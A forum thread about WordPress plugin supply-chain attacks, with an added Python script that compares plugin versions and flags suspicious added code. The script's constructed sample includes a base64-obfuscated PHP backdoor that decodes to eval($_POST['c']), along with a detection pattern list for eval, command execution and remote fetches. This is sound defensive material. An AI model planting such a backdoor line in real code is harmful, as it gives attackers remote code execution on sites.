I just saw this pass by on one of my feeds and figured now is as good a time as any to remind everyone again to keep a close eye on security updates, now more than ever.
I know Updraft is a pretty popular plugin for WordPress, so if you’re using it… get on this; it sounds potentially quite serious:
I’m hesitant to suggest any automatic updates now. There have been so many supply chain attacks… including WordPress plugins. E.g., there was the recent giant pile of WordPress plugins that were acquired and immediately injected with malware. So an official upstream update included malware… if you updated immediately after those got released, you got popped.
I’m recommending:
Minimize plugins. If you don’t really need it, get it out of your systems.
Keep up with who owns/develops your plugins.
Read the release notes or change log. If it’s open source, look at the actual commits.
I don’t like it, but things are getting hairy out there.
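Added example, not code from any of the posters: one way to act on the "read the change log and look at the actual diff before you update" advice is to compare the plugin you have installed against the update before applying it. The script below takes two in-memory copies of a plugin tree (the file names and contents are constructed for illustration; a real run would read the installed directory and the unpacked update zip), reports changes to the plugin header fields such as Author and Version, lists added and removed files, and flags added lines that contain constructs an update rarely needs (eval, base64_decode, command execution, raw request input, remote fetches), including inside decoded base64 string literals. The pattern list is an assumed starting point, not a complete signature set.

```python
import base64
import difflib
import re

# Constructed sample trees for a hypothetical "example-plugin" before and
# after an update. Paths, names and contents are invented for illustration.
OLD_FILES = {
    "example-plugin/example-plugin.php": (
        "<?php\n/*\nPlugin Name: Example Plugin\nVersion: 1.2.0\n"
        "Author: Original Dev\n*/\nfunction example_plugin_init() {\n"
        "    add_action('init', 'example_plugin_register');\n}\n"
    ),
}
NEW_FILES = {
    "example-plugin/example-plugin.php": (
        "<?php\n/*\nPlugin Name: Example Plugin\nVersion: 1.2.1\n"
        "Author: New Owner LLC\n*/\nfunction example_plugin_init() {\n"
        "    add_action('init', 'example_plugin_register');\n}\n"
    ),
    # A new file the update drops in; the literal decodes to eval($_POST['c']);
    "example-plugin/includes/loader.php": (
        "<?php\n$p = base64_decode('ZXZhbCgkX1BPU1RbJ2MnXSk7');\neval($p);\n"
    ),
}

HEADER_FIELDS = ("Plugin Name", "Plugin URI", "Version", "Author", "Author URI")

# Constructs that rarely belong in a legitimate update. A hit is a prompt to
# read the surrounding code, not proof of malware (assumed list, not exhaustive).
SUSPICIOUS = [
    (re.compile(r"\beval\s*\("), "eval()"),
    (re.compile(r"\bbase64_decode\s*\("), "base64_decode()"),
    (re.compile(r"\b(?:shell_exec|exec|system|passthru)\s*\("), "command execution"),
    (re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b"), "raw request input"),
    (re.compile(r"\b(?:curl_exec|file_get_contents)\s*\(\s*['\"]https?://"), "remote fetch"),
]
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def parse_header(source):
    """Extract 'Field: value' lines from the top-of-file plugin header comment."""
    header = {}
    for line in source.splitlines()[:30]:
        for field in HEADER_FIELDS:
            m = re.match(r"\s*\*?\s*" + re.escape(field) + r"\s*:\s*(.+)", line)
            if m:
                header[field] = m.group(1).strip()
    return header


def find_main(files):
    """The main plugin file is the one carrying the 'Plugin Name:' header."""
    return next((src for src in files.values() if "Plugin Name:" in src), "")


def scan_line(path, line, findings, context=""):
    """Record every suspicious construct in one line, then look inside base64 literals."""
    for pattern, label in SUSPICIOUS:
        if pattern.search(line):
            findings.append((path, context + label, line.strip()))
    if context:  # do not recurse into already-decoded content
        return
    for m in B64_LITERAL.finditer(line):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            continue
        scan_line(path, decoded, findings, context="decoded base64: ")


def review_update(old_files, new_files):
    """Summarise what a human should read before letting this update in."""
    old_hdr, new_hdr = parse_header(find_main(old_files)), parse_header(find_main(new_files))
    header_changes = {
        f: (old_hdr.get(f), new_hdr.get(f))
        for f in HEADER_FIELDS if old_hdr.get(f) != new_hdr.get(f)
    }
    findings = []
    for path, src in new_files.items():
        if path in old_files:
            # Only lines the update adds need review; unchanged code was already there.
            diff = difflib.unified_diff(old_files[path].splitlines(), src.splitlines(),
                                        lineterm="", n=0)
            added = [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]
        else:
            added = src.splitlines()
        for line in added:
            scan_line(path, line, findings)
    return {
        "header_changes": header_changes,
        "added_files": sorted(set(new_files) - set(old_files)),
        "removed_files": sorted(set(old_files) - set(new_files)),
        "findings": findings,
    }


if __name__ == "__main__":
    for key, value in review_update(OLD_FILES, NEW_FILES).items():
        print(key, value)
```

On the constructed sample the report shows the Author header changing hands alongside the version bump, a brand-new `includes/loader.php`, and four findings from that file, two of them from the decoded base64 literal. That combination (ownership change plus obfuscated input handling in a new file) is exactly what the "keep up with who owns your plugins" and "look at the actual commits" advice is meant to catch before the update goes live.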
This is definitely the new meta and I had forgotten about it. WordPress Org should do something about this. I certainly will not be using that other plugin website or that fork of WordPress.
The WordPress folks have been doing stuff about it for years. They scan for known malware, etc., and they removed all of those plugins, banned the developer, and rolled a repair patch with the next version of WordPress.
But we live in dangerous times. Machines with only modest guidance can find and exploit software at a rate far faster than humans can fix it.